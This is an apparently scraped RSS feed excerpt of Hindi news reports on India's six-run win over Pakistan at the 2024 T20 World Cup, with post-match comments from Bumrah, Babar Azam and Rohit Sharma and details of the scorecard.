उन्होंने आगे कहा, "एक गेंदबाजी इकाई के तौर पर हमें अपनी गेंदबाजी पर बहुत गर्व है। हम खुद को बेहतर करने के लिए कड़ी मेहनत करते हैं और जितना हो सके टीम की मदद करने की कोशिश करते हैं। इसलिए हम बहुत खुश हैं कि हम इस मैच में ऐसा करने में सफल रहे।"

बुमराह ने अपनी बात खत्म करते हुए कहा, "एक साल पहले यही लोग कह रहे थे कि मैं शायद दोबारा नहीं खेल पाऊंगा और मेरा करियर खत्म हो जाएगा। लेकिन मैं इस पर गौर नहीं करता। जहां तक मेरा सवाल है, मैं अपनी सर्वश्रेष्ठ क्षमता से गेंदबाजी करने की कोशिश कर रहा हूं। मैं अपने सामने मौजूद समस्या का समाधान और चीजों पर नियंत्रण करने की कोशिश करता हूं।"

 

टी20 विश्व कप: भारत से मिली हार के बाद बाबर ने कहा- हमने बहुत ज्यादा डॉट बॉल खेली

 आईसीसी टी 20 विश्व कप मैच में भारत के खिलाफ छह रन से हार के बाद, पाकिस्तान के कप्तान बाबर आजम ने स्वीकार किया कि उनकी टीम ने पारी के दूसरे भाग में अधिक डॉट बॉल खेली, जिससे शानदार गेंदबाजी के बावजूद उनकी हार हुई।

रविवार को न्यूयॉर्क के नासाऊ काउंटी स्टेडियम में गेंद और बल्ले के बीच रोमांचक मुकाबले में 120 रनों के लक्ष्य का पीछा कर रही पाकिस्तान की टीम एक समय जीत की स्थिति में थी, लेकिन इसके बाद जसप्रीत बुमराह और हार्दिक पांड्या ने अपनी गेंदबाजी से मैच को वापस खींच लिया और भारत को 6 रन से जीत दिला दी।

मैच के बाद बाबर ने कहा, हमने अच्छी गेंदबाजी की। बल्लेबाजी में, हमने लगातार दो विकेट खोए और बहुत सारी डॉट बॉल खेली। रणनीति सामान्य रूप से खेलना आसान था। बस स्ट्राइक रोटेशन और कुछ बाउंड्री। लेकिन उस अवधि में (उनके रन-चेज़ के दूसरे भाग में) हमने बहुत सारी डॉट बॉल खेली। हम टेलएंडर्स से बहुत उम्मीद नहीं कर सकते। हमारा दिमाग बल्लेबाजी में पहले छह ओवरों का उपयोग करने पर था। लेकिन एक विकेट गिरने के बाद, हम फिर से उस चरण में अच्छा प्रदर्शन नहीं कर पाए। पिच अच्छी दिख रही थी। गेंद अच्छी तरह से आ रही थी। यह थोड़ी धीमी थी, और कुछ गेंदें अतिरिक्त उछाल वाली थीं। हमें आखिरी दो मैच जीतने हैं। बैठकर अपनी गलतियों पर चर्चा करेंगे, लेकिन आखिरी दो मैचों का बेसब्री से इंतजार है।

इस रोमांचक मुकाबले में जीत के बाद भारत दो मैचों में दो जीत और चार अंकों के साथ ग्रुप ए में शीर्ष पर है। पाकिस्तान चौथे स्थान पर है, जिसने अमेरिका और भारत से अपने दोनों मैच हारे हैं। नॉकआउट चरण में उनके पहुंचने की संभावना कम ही दिखती है।

मैच की बात करें तो पाकिस्तान ने टॉस जीतकर भारत को पहले बल्लेबाजी के लिए आमंत्रित किया। हालांकि, भारतीय बल्लेबाज इस कठिन सतह पर अच्छा प्रदर्शन नहीं कर पाए और स्टार ओपनर विराट कोहली (4) और रोहित शर्मा (13) बड़ा स्कोर बनाने में विफल रहे। ऋषभ पंत (31 गेंदों में 42 रन, छह चौके) एक अलग पिच पर खेल रहे थे और उन्होंने अक्षर पटेल (18 गेंदों में 20 रन, दो चौके और एक छक्का) और सूर्यकुमार यादव (आठ गेंदों में सात रन, एक चौका) के साथ उपयोगी साझेदारियां कीं। हालांकि, ऐसी कठिन पिच पर रन बनाने के दबाव में निचला मध्य क्रम बिखर गया और भारत 19 ओवर में सिर्फ 119 रन ही बना सका।

पाकिस्तान के लिए हारिस राउफ और नसीम शाह ने 3-3, मोहम्मद आमिर ने दो और शाहीन शाह अफरीदी ने एक विकेट लिया।

रन-चेज़ में पाकिस्तान ने ज़्यादा संतुलित रुख अपनाया और मोहम्मद रिज़वान (44 गेंदों में एक चौके और एक छक्के की मदद से 31 रन) ने एक छोर संभाले रखा। हालांकि, बुमराह (3/14) और हार्दिक पांड्या (2/24) ने कप्तान बाबर आज़म (13), फखर जमान (13), शादाब खान (4), इफ्तिखार अहमद (5) के महत्वपूर्ण विकेट भी हासिल किए, जिससे पाकिस्तान पर दबाव बरकरार रहा। अंतिम ओवर में 18 रनों की ज़रूरत के साथ, नसीम शाह (10*) ने पाकिस्तान के लिए जीत की कोशिश की, हालांकि, अर्शदीप सिंह (1/31) ने सुनिश्चित किया कि पाकिस्तान छह रन से पीछे रह जाए। बुमराह ने अपने मैच जीतने वाले स्पेल के लिए 'प्लेयर ऑफ़ द मैच' का पुरस्कार जीता।

 

 

]]>
बुमराह जीनियस है, चाहता हूं कि इसी मानसिकता से आगे भी खेले: रोहित शर्मा https://pratyushaashakinayikiran.com/?p=39857 Mon, 10 Jun 2024 17:17:00 +0000 https://pratyushaashakinayikiran.com/?p=39857 न्यूयॉर्क
भारतीय कप्तान रोहित शर्मा ने जसप्रीत बुमराह को ‘जीनियस’ करार देते हुए कहा कि वह चाहते हैं कि यह तेज गेंदबाज टी20 विश्व कप में आगे भी इसी तरह का प्रदर्शन जारी रखे। बुमराह की शानदार गेंदबाजी की बदौलत भारत ने अपने कम स्कोर का बचाव करते हुए चिर प्रतिद्वंद्वी पाकिस्तान को 6 रन से हराया। भारतीय टीम पहले बल्लेबाजी करते हुए 119 रन पर आउट हो गई। इसके जवाब में पाकिस्तान की टीम सात विकेट पर 113 रन ही बना पाई। बुमराह ने चार ओवर में 14 रन देकर तीन विकेट लिए।

रोहित ने मैच के बाद कहा, ‘‘उसके (बुमराह) प्रदर्शन में लगातार निखार आ रहा है। हम सभी जानते हैं कि वह क्या कर सकता है। उसके बारे में बहुत अधिक बात नहीं करूंगा। हम चाहते हैं कि वह पूरे विश्व कप में इसी तरह की मानसिकता के साथ खेले। वह जीनियस है। हम सभी यह जानते हैं।’’ भारतीय कप्तान ने कहा कि कम स्कोर बनाने के बावजूद उनको मैच जीतने का विश्वास था क्योंकि पिच बल्लेबाजी के लिए अनुकूल नहीं थी। उन्होंने कहा, ‘‘हमारे पास जिस तरह का गेंदबाजी आक्रमण है उससे हम आश्वस्त थे। जब वे बल्लेबाजी कर रहे थे तो हमने आपस में कहा कि अगर हमारे साथ ऐसा हो सकता है तो उनके साथ भी हो सकता है।’’

भारत का स्कोर एक समय तीन विकेट पर 89 रन था लेकिन इसके बाद उसने 30 रन के अंदर सात विकेट गंवा दिए। रोहित ने स्वीकार किया कि उनकी टीम को अच्छी बल्लेबाजी करनी चाहिए थी। उन्होंने कहा, ‘‘हमने अच्छी बल्लेबाजी नहीं की। हमारी पारी के आधे भाग तक हम अच्छी स्थिति में थे। हम अच्छी साझेदारी निभाने में नाकाम रहे। हमने बात की की इस तरह की पिच पर प्रत्येक रन मायने रखता है। ईमानदारी से कहूं तो पिछले मैच की तुलना में यह अच्छा विकेट था।’’ रोहित ने कहा, ‘‘इस तरह के विकेट पर थोड़ा योगदान भी बड़ा अंतर पैदा कर सकता है।’’

बुमराह को लगातार दूसरे मैच में मैन ऑफ द मैच चुना गया। उन्होंने कहा कि दूसरी पारी में बल्लेबाजी करना आसान हो गया था लेकिन भारतीय गेंदबाजों ने अनुशासित प्रदर्शन किया। बुमराह ने कहा, ‘‘सच में बहुत अच्छा लग रहा है। हमने थोड़ा कम रन बनाए थे और धूप खिलने के बाद बल्लेबाजी करना थोड़ा आसान हो गया था। हमने वास्तव में अनुशासित गेंदबाजी की और इसलिए यह अच्छा लग रहा है।’’ पाकिस्तान के कप्तान बाबर आजम ने कहा कि लक्ष्य का पीछा करते हुए 59 गेंद पर रन नहीं बना पाना टर्निंग प्वाइंट साबित हुआ। बाबर ने कहा, ‘‘हमने अच्छी गेंदबाजी की लेकिन बल्लेबाजी में हमने लगातार विकेट गंवाए। हमने कई गेंदे खाली जाने दी। हम फिर से पहले छह ओवर में अपेक्षित प्रदर्शन नहीं कर पाए।’’

टीम की रणनीति के बारे में पूछे जाने पर बाबर ने कहा, ‘‘हमारी रणनीति सहज होकर खेलना था। हमने एक दो रन लेने और बीच में बाउंड्री लगाने की रणनीति बनाई थी लेकिन इस बीच हमने काफी गेंद खाली जाने दी और ऐसे में पुछल्ले बल्लेबाजों से बहुत अधिक उम्मीद नहीं कर सकते।’’ उन्होंने कहा, ‘‘पिच अच्छी नजर आ रही थी। गेंद बल्ले पर अच्छी तरह से आ रही थी। अब हमें अंतिम दो मैच जीतने होंगे। हमारी निगाह अब अगले दो मैच पर टिकी है।’’

 

]]>